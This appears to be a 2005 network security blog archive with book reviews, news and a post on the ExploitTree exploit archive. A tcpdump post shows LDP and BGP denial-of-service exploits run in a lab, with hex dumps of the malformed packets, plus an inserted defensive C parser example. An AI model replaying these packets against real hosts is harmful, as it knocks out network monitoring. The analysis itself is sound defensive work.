Saturday, April 30, 2005

Reviews of VoIP Security, The Internet and Its Protocols Posted

I refused to let April end without finishing and reviewing these two books kindly provided by Elsevier Press. The first was a disappointment. Amazon.com just posted my three-star review of VoIP Security. From the review:

"I decided to read VoIP Security because I thought it would describe VoIP protocols and ways to secure them. The table of contents looked very strong and the preface seemed to meet my goals: "For one to truly understand Internet telephony, the reader must have a solid understanding of digital voice, telephony, networking, Internet protocols, and, most important of all, how all of these technologies are put together." Unfortunately, the book is confusing at times and is not an improvement over earlier VoIP security books. So-called 'reviewers' who write that this book 'goes heavily into explaining the low level mechanics of VoIP' reveal they don't read the books they purport to review."

Thankfully, I was very pleased to read the second book Elsevier sent me. Amazon.com just posted my five-star review of Adrian Farrel's The Internet and Its Protocols. From the review:

"Adrian Farrel's The Internet and Its Protocols (TIAIP) blew me away. I read this book because it explains the Internet I know, but also how new protocols work with that Internet and make it different from the network I first encountered over a decade ago. Farrel's amusing yet clear writing style delivers a great deal of knowledge in a hefty hardcover. If you want to learn about the protocols that make the Internet work, you need to read TIAIP."

If you want to get a handle on the new protocols appearing in your network, like Multi-Protocol Label Switching (MPLS) or Stream Control Transmission Protocol (SCTP), you should read The Internet and Its Protocols.

FreeBSD 5.4-RC4 Imminent

As I guessed recently, we should see FreeBSD 5.4-RELEASE arrive next week or very soon thereafter. Scott Long posted an update on the release status of 5.4 this morning. He says:

"As you probably noticed, we are a bit behind on the 5.4 release. There was a major stability problem reported several weeks ago in a particular high load, high profile environment, and we decided that it was in everyone's best interest to get it resolved before the release. Well, thanks to the tireless efforts of Doug White and Stephen Uphoff and several others, the bug has been found, fixed, and verified. As soon as it and a few other fixes get merged in, we will start the RC4 build process and hopefully release it for testing late this weekend. After that, unless another show-stopper comes up, we expect to build and release 5.4-RELEASE next weekend."

I hope to test 5.4-RC4 this week, assuming it arrives tomorrow. Thanks FreeBSD release team!

SecurityForest.com ExploitTree

This afternoon I was researching a bot for a chapter in my latest book. I don't spend a lot of time on exploit sites because I am not a penetration tester by trade. I think the last time I really looked at exploits, sites like www.hack.co.za were still around!

While searching for the bot in question, I happened to find SecurityForest.com, although the site was announced on BugTraq in March. SecurityForest.com is an impressive piece of work. The site is essentially a giant CVS archive of attack code, called the ExploitTree. They provide a Client Utility, which, at least for UNIX, is an interface to a native CVS client. For Windows, they provide everything you need to access a CVS server.

Here is how a session using the ExploitTree Client Utility appears under UNIX.


./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 1
Password is blank (press enter), then wait...

Logging in to :pserver:anonymous@cvs.securityforest.com:2401/home/security/cvsroot
CVS password:
cvs login: warning: failed to open /home/richard/.cvspass for reading:
No such file or directory
cvs server: Updating ExploitTree
U ExploitTree/_SecurityForest
U ExploitTree/_Ver
U ExploitTree/bids.txt
U ExploitTree/exploit_db.txt
U ExploitTree/xsearch.pl
U ExploitTree/xsearch2-beta.pl
cvs server: Updating ExploitTree/application
U ExploitTree/application/_SecurityForest
cvs server: Updating ExploitTree/application/_uncategorized
U ExploitTree/application/_uncategorized/0verkill-exploit.c
U ExploitTree/application/_uncategorized/0x82-GNATS_sux.c
U ExploitTree/application/_uncategorized/0x82-Remote.tannehehe.xpl.c
U ExploitTree/application/_uncategorized/0x82-libCGIfpxpl.c
U ExploitTree/application/_uncategorized/101_shixx.cpp
...edited...
U ExploitTree/system/tru64/TRU64_xkb.pl
U ExploitTree/system/tru64/_SecurityForest
Quiting...

Here's an example of what one finds when the download process is finished.

janney:/home/richard/exploittree/ExploitTree$ ls
CVS bids.txt xsearch.pl
_SecurityForest exploit_db.txt xsearch2-beta.pl
_Ver network
application system
janney:/home/richard/exploittree/ExploitTree$ cd system/
janney:/home/richard/exploittree/ExploitTree/system$ ls
CVS atheos irix novell tru64
_SecurityForest beos linux qnx
_uncategorized bsd mac_osx sco
aix hpux microsoft solaris
janney:/home/richard/exploittree/ExploitTree/system$ cd bsd
janney:/home/richard/exploittree/ExploitTree/system/bsd$ ls
CVS _SecurityForest local remote
janney:/home/richard/exploittree/ExploitTree/system/bsd$ cd remote/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ ls
CVS animal.c freebsd obooptd.c rpc.autofsd.c
_SecurityForest bsdi netbuf.c openbsd stream3.c
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ cd freebsd/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote/freebsd$ ls
CVS fbsd-DoS.c ronin.c
DSR-cfengine.pl fbsd-bnc.c turkey2.c
_SecurityForest ftpspy.c
cURL-remote-FBSD.pl ppp.c

I chose a sparsely populated set of directories. The Microsoft section is much longer.

What's nice about this set-up is that you can synchronize your local copy of the ExploitTree with the SecurityForest.com version using CVS.

Other helpful exploit sites include milw0rm.com and ExploitWatch, which reports on newly available exploits by linking to them.

Friday, April 29, 2005

Cut Budgets If Security Fails to Improve?

I find this note from a recent GovExec story valuable:

"House Government Reform Chairman Tom Davis, R-Va., said Thursday [7 April] that agencies could have their budgets cut if their information technology security does not improve.

With several agencies struggling to meet requirements of the 2002 Federal Information Security Management Act, Davis said that compliance eventually has to be tied to funding."

This will never happen. Does Congress advocate cutting funds to poorly performing schools? Regardless of the merits of the approach, I cannot see enough people supporting this tactic. Agencies will continue to "muddle through" until evidence of a massive intrusion becomes public. I hope that day never arrives, though.

Join Me at USENIX Security 05

You may have noticed the new banner at the top of the blog showing the 14th USENIX Security Symposium in Baltimore, MD, 31 July - 5 August 2005. I presented a one day NSM tutorial at USENIX Security 04 in San Diego, CA last year, and an improved version of that course at USENIX 05 in Anaheim, CA two weeks ago.

In Baltimore this summer, I will be presenting Network Security Monitoring with Open Source Tools on 31 July, followed by my brand-new Network Incident Response tutorial on 1 August. Descriptions for each class are available via the provided links. I am really looking forward to offering these classes, especially with the MD-DC-VA crowds in attendance. These are both day-long classes.

If you register before 11 July, one day will cost $625 and two days will cost $1200 (for non-students). USENIX offers discounts if five or more people from the same organization attend.

I plan to create a proposal for a network forensics class, and submit it along with my NSM and network IR tutorials for the Large Installation System Administration (LISA) conference in December in San Diego, CA. If you would like to see such a class, please contact the training coordinator and let him know!

What's the difference between network IR and network forensics? The network IR class is more about reacting to, containing, and remediating intrusions. It's similar to firefighting. The network forensics class covers collecting, preserving, analyzing, presenting (perhaps to a jury), and defending (under cross-examination) network evidence. The forensics angle concentrates on ensuring your investigation is sound and could support a successful prosecution or human resources action, if necessary.

IR and forensics subjects are often taught from a host-centric perspective, so I believe there is room for network-focused tutorials.

Two More Pre-Reviews

Two new books arrived at TaoSecurity world headquarters this week to be added to my reading queue. The first is Silence on the Wire by Michal Zalewski. This looks like a creative and unconventional look at digital security, although the book's subtitle is "A Field Guide to Passive Reconnaissance and Indirect Attacks." Michal was kind enough to email me to ask if I would review his book. You may recognize Michal for some of his work, like the P0f tool or his really cool TCP sequence number analysis.

The second book is Python Cookbook, 2nd Ed by Alex Martelli, Anna Ravenscroft, and David Ascher. This new edition covers Python 2.3 and 2.4. I consider this book another piece of my Python education program, which I plan to start in the next month or so. This book is helpful because it presents over 300 problems, code solutions, and discussions of those problems. Assuming the code is good, Python programmers will not have to reinvent the wheel if a problem they face is similar to one in the book. I think this sort of "solid code reuse plan" makes a lot of sense.

If you're wondering why you haven't seen any recent book reviews, I'm working my way through the excellent The Internet and Its Protocols by Adrian Farrel. It's an 800 page protocol text, so it's taking a while. I also read everything I review, unlike some of the other reviewers with higher Amazon rankings!

Sources of Free Security Market Research

This morning I was looking for security market research and I came across two useful resources. First, CSO Online provides an Analyst Report section with summaries of research by all of the big name firms. For example, you can read about Symantec Gains Added Vendor Neutrality with New IPS Support by Current Analysis or Deciphering the Dual Meaning of Compliance Monitoring by Forrester. These are not the full articles, but there is enough there to make for interesting reading.

I also found some good press releases on security research from Infonetics Research. These include:

The last article's chart is revealing. It appears in-line "IPS" platforms are set to have a greater revenue share in 2005 than network IDS for the first time. I don't find this surprising. When I looked this morning to find the "leading" IDS or IPS solutions, I created this list:

What would you add to this list? If you were to take a next-generation course on IDS/IPS and network security monitoring, what products would you want to try, hands-on, in the class?

Thursday, April 28, 2005

Internal Revenue Service Hassling You? Cite Security Issues

I filed my taxes a few weeks ago. Now I read in Techweb and Reuters that the Internal Revenue Service's security is horrible. According to Andy Sullivan of Reuters:

"Security flaws in computer systems used by the Internal Revenue Service expose millions of taxpayers to potential identity theft or illegal police snooping, according to a congressional report released today.

The IRS also is unlikely to know if outsiders are browsing through citizens' tax returns because it doesn't effectively police its computer systems for unauthorized use, the Government Accountability Office found."

Greg Keizer writes even more disturbing findings:

"The GAO, for instance, found that nearly 7,500 mainframe users, which included IRS employees, independent contractors, and non-IRS government employees, all have the ability to access and even change 'sensitive taxpayer' data.

Lack of other security controls and wide-open access privileges mean that the IRS might not even know if an identity breach has occurred, said the GAO."

The Government Accountability Office (GAO) report is available in .pdf form here.

It sounds like the IRS cannot account for the integrity of its data. If that is the case, they cannot be sure if the information entered by an e-Filer is what the taxpayer actually entered. They cannot be sure of anything unless they have a paper record or a duplicate, separate electronic record protected by alternate means. I guess it was a good idea for me to submit paper records to the IRS -- as long as they are available for review.

Cyber Incident Detection and Data Analysis Center Goes Public

In October 2003 I reported on the Cyber Incident Detection & Data Analysis Center (CIDDAC), a collaboration of the University of Pennsylvania's Institute of Strategic Threat Analysis and Response (ISTAR) laboratory in Philadelphia, the Philadelphia InfraGard chapter, and Charles "Buck" Fleming, CEO of the apparently dormant AdminForce LLC. Details in 2003 were sparse, but I was skeptical that companies would agree to host "what CIDDAC calls Real-time Cyber Attack Detection Sensors, or RCADS, throughout as many U.S. companies as possible — and eventually the world — and feed incident data to a centrally managed operations facility at the University of Pennsylvania at Philadelphia."

Stories by Infoworld and Computerworld are shedding some light on the situation. First, it does not appear CIDDAC will watch company traffic. Instead, they are just deploying honeypots:

"John Chesson, a special agent at the FBI in Philadelphia, said the RCADS are essentially 'hardened honeypots' that look like they are part of the network an intruder is trying to enter. When the RCADS are attacked, CIDDAC workers monitor the event and collect real-time data that can be forwarded to law enforcement officials, he said."

I found this comparison chart interesting. It allegedly shows how CIDDAC is superior to other data collection methods.

I wonder what metrics CIDDAC used to determine the width of the colored bars for a competing organization, like CERT? It must be a Philly vs. Pittsburgh issue.

Check this out:

"The initial 30 participants, who are anonymous for security reasons, will pay about $10,000 for the installation of the RCADs and for the first year of monitoring and reports.

'We take minutes to analyze what now takes hours,' Fleming said. 'We know it's going to work. We've had prototypes working for years now.'"

According to reporting, CIDDAC is DHS funded:

"The pilot project, which has been in the planning stages for two years, is being funded through a $200,000 grant from the DHS Science and Technology Directorate and with the support of the FBI."

The CIDDAC FAQ offers these details:

"CIDDAC has received its initial funding and construction is underway at our University of Pennsylvania facility. The build-out, setup and testing estimated completion date is no later than October 2005. CIDDAC services will be available by December 2005."

I'll keep my eye on this project. I would be interested in speaking with anyone from CIDDAC who would like the project profiled here. It seems CIDDAC is a honeypot-based managed security services provider that charges $10,000 per year, has start-up funding from DHS, and works with the Philadelphia FBI and U Penn. Am I wrong?

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking the latest exploits at Packet Storm. Linking to the exploits themselves, they are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a denial of service against the local Tcpdump process, which spins forever in ldp_print(). No system needs to be listening on port 646 for Tcpdump to be affected: the exploit sends UDP datagrams to port 646, and Tcpdump dissects them as soon as it sees them on the wire.

If you run xtcpdump-ldp-dos, it looks like this to the attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI without the -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add the -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees the traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a denial of service against the local Tcpdump process. Unlike the LDP case, a system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected, because the exploit completes a TCP handshake before it sends the malformed UPDATE message. I simulated this by having Netcat listen on port 179 TCP.

If you run the compiled xtcpdump-bgp-dos, it looks like this to the attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI with the -v switch:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ethernet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535
<mss 1460,nop,wscale 1,nop,nop,timestamp 145837700 0>

09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535
<mss 1460,nop,wscale 1,nop,nop,timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 <nop,nop,timestamp 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 <nop,nop,timestamp 145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...
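The LDP and BGP failures above have the same shape: a dissector loop that trusts a length field (the captured LDP PDU claims 65535 bytes inside an 18-byte datagram; the MP_REACH_NLRI attribute claims 255 bytes with 7 present) or that keeps iterating after a decode step rejects an entry, which is how "(illegal prefix length)" repeats forever. What follows is an added example written for this page, not tcpdump's source: a C program with bounds-checked walkers for both record formats, run against the LDP payload and the BGP attribute bytes transcribed from the Snort dumps on this page plus three inputs constructed here. Field layouts follow RFC 3036 (LDP), RFC 2858 (MP_REACH_NLRI) and RFC 4684 (Route Target NLRI); the function names, the WALK_ codes and the assumption of an empty SNPA list are this example's own.

```c
/* Added example, not tcpdump code: bounded record walkers for the formats above.
 * "page" arrays are transcribed from this page's Snort dumps; the rest are
 * constructed for contrast.  Build: cc -Wall -o walk walk.c && ./walk */
#include <stdint.h>
#include <stdio.h>

enum { WALK_TRUNCATED = -1, WALK_BAD_LEN = -2, WALK_NO_PROGRESS = -3 };
static unsigned be16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* LDP PDU (RFC 3036): version(2) pdu_len(2) ldp_id(6), then messages of
 * type(2) msg_len(2) msg_id(4)...  pdu_len excludes the first 4 bytes and
 * msg_len excludes the 4-byte message header, so a legal message is >= 4.
 * Returns the message count, or a negative WALK_ code. */
int ldp_walk(const uint8_t *buf, size_t len)
{
    size_t off = 10, end, msg_len;
    int count = 0;
    if (len < 10) return WALK_TRUNCATED;
    end = 4 + be16(buf + 2);
    if (end > len) return WALK_TRUNCATED;       /* page packet: claims 65535 bytes */
    while (off < end) {
        if (end - off < 4) return WALK_TRUNCATED;
        msg_len = be16(buf + off + 2);
        if (msg_len < 4) return WALK_BAD_LEN;   /* cannot hold the Message ID */
        if (msg_len > end - off - 4) return WALK_TRUNCATED;
        off += 4 + msg_len;                     /* every pass advances >= 8 */
        count++;
    }
    return count;
}

/* One Route Target NLRI entry (RFC 4684): prefix length in bits (0 or 32..96)
 * then ceil(bits/8) bytes. Returns bytes consumed (> 0) or a negative code,
 * the same contract as tcpdump's decode_rt_routing_info(). */
static int decode_rt_entry(const uint8_t *p, size_t avail)
{
    unsigned bits, nbytes;
    if (avail < 1) return WALK_TRUNCATED;
    bits = p[0];
    if (bits != 0 && (bits < 32 || bits > 96)) return WALK_BAD_LEN;
    nbytes = (bits + 7) / 8;
    if (nbytes > avail - 1) return WALK_TRUNCATED;
    return (int)(1 + nbytes);
}

/* Walk NLRI entries: a step that fails or consumes nothing ends the walk
 * instead of being added to the cursor. Returns entry count or negative. */
int rt_nlri_walk(const uint8_t *p, size_t len)
{
    size_t off = 0;
    int count = 0, adv;
    while (off < len) {
        adv = decode_rt_entry(p + off, len - off);
        if (adv < 0) return adv;
        if (adv == 0) return WALK_NO_PROGRESS;
        off += (size_t)adv;
        count++;
    }
    return count;
}

/* MP_REACH_NLRI attribute (RFC 2858) from its flags octet: flags(1) type(1)
 * len(1, or 2 when flag 0x10 is set) AFI(2) SAFI(1) nh_len(1) nexthop
 * snpa_count(1) NLRI. The claimed length is checked against the bytes present
 * before the walk. Assumption: the SNPA list is empty, as in the captured packet. */
int mp_reach_rt_walk(const uint8_t *attr, size_t len)
{
    size_t hdr, alen, off;
    if (len < 3 || attr[1] != 14) return WALK_BAD_LEN;
    hdr = (attr[0] & 0x10) ? 4 : 3;
    if (len < hdr) return WALK_TRUNCATED;
    alen = (attr[0] & 0x10) ? be16(attr + 2) : attr[2];
    if (alen > len - hdr) return WALK_TRUNCATED; /* page packet: claims 255, has 7 */
    if (alen < 5) return WALK_BAD_LEN;
    off = hdr + 4 + attr[hdr + 3];               /* past AFI, SAFI, nh_len, nexthop */
    if (off >= hdr + alen) return WALK_TRUNCATED;
    if (attr[off] != 0) return WALK_BAD_LEN;     /* SNPA list not handled here */
    return rt_nlri_walk(attr + off + 1, hdr + alen - off - 1);
}

/* Transcribed from the page's Snort dumps (LDP UDP payload; BGP path attribute
 * from its flags octet), then constructed inputs: a zero-length LDP message, a
 * minimal Hello, and an MP_REACH_NLRI whose second RT entry has an 8-bit prefix. */
static const uint8_t ldp_page[] = { 0x00,0x01,0xff,0xff,0xff,0xff,0xff,0xff,
    0xff,0xff,0xff,0xff,0x00,0x00,0xff,0xff,0xff,0xff };
static const uint8_t bgp_attr_page[] = { 0xff,0x0e,0x00,0xff,0x00,0x01,0x84,
    0x00,0x00,0x00,0x00 };
static const uint8_t ldp_zero_msg[] = { 0x00,0x01,0x00,0x0a,0x0a,0x00,0x00,
    0x01,0x00,0x00,0x01,0x00,0x00,0x00 };
static const uint8_t ldp_hello[] = { 0x00,0x01,0x00,0x0e,0x0a,0x00,0x00,0x01,
    0x00,0x00,0x01,0x00,0x00,0x04,0x00,0x00,0x00,0x01 };
static const uint8_t bgp_attr_bad_rt[] = { 0x90,0x0e,0x00,0x08,0x00,0x01,
    0x84,0x00,0x00,0x00,0x08,0x01 };
int main(void)
{
    printf("ldp: page=%d zero_msg=%d hello=%d  bgp: page=%d bad_rt=%d\n",
           ldp_walk(ldp_page, sizeof ldp_page), ldp_walk(ldp_zero_msg, sizeof ldp_zero_msg),
           ldp_walk(ldp_hello, sizeof ldp_hello), mp_reach_rt_walk(bgp_attr_page, sizeof bgp_attr_page),
           mp_reach_rt_walk(bgp_attr_bad_rt, sizeof bgp_attr_bad_rt));
    return 0;
}
```

Each walker returns a count on success and a negative code otherwise, and every loop pass either consumes at least one byte or returns; that property, rather than any one check, is what rules out the spin. The page's LDP packet and BGP attribute both come back as WALK_TRUNCATED at the length check, the constructed zero-length LDP message and the 8-bit Route Target prefix come back as WALK_BAD_LEN, and only the well-formed Hello yields a message count, instead of the endless "length: 0" or "(illegal prefix length)" lines shown above.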

Here is how Snort sees the traffic. Although the entire session is shown, the fourth packet is the killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .<w.@.@.?.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
